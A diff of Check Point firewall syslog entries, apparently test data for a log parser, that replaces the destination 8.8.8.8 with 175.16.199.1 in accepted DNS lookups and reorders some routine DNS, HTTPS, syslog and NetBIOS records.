-<134>1 2020-03-29T23:17:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812c79,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585523833"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60023"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T23:17:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812c79,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40357"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T23:17:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812c79,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585523833"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60023"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T23:17:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812c7a,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
-<134>1 2020-03-29T23:17:23Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812c83,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585523843"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47700"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T23:17:23Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812c83,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585523843"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58686"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T23:17:23Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812c83,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585523843"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47700"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T23:17:23Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812c83,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585523843"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58686"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T23:17:30Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812c8a,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52353"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T23:17:30Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812c8a,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52354"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T23:17:30Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812c8a,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52355"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T23:17:30Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812c8a,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52356"; service:"443"; service_id:"https"; src:"192.168.1.117"]
-<134>1 2020-03-29T23:17:33Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812c8d,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585523853"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50741"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T23:17:33Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812c8d,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585523853"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47518"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T23:17:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812c97,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585523863"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51089"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T23:17:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812c97,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585523863"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39925"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T23:17:33Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812c8d,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585523853"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50741"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T23:17:33Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812c8d,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585523853"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47518"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T23:17:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812c97,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585523863"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51089"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T23:17:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812c97,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585523863"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39925"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T23:17:53Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812ca0,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48993"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T23:17:53Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812ca0,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.81.142.43"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"45830"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10855"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T23:17:53Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812ca1,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48270"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T23:17:53Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812ca1,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.36"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"48770"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10856"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T23:17:53Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812ca1,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42559"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T23:17:53Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812ca1,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.31"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"41072"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10857"; xlatesrc:"0.0.0.0"]
-<134>1 2020-03-29T23:17:53Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812ca1,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585523873"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47854"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T23:17:53Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812ca1,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585523873"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47854"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T23:17:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812ca2,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-29T23:18:01Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812ca9,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"138"; service:"138"; service_id:"nbdatagram"; src:"192.168.1.117"]
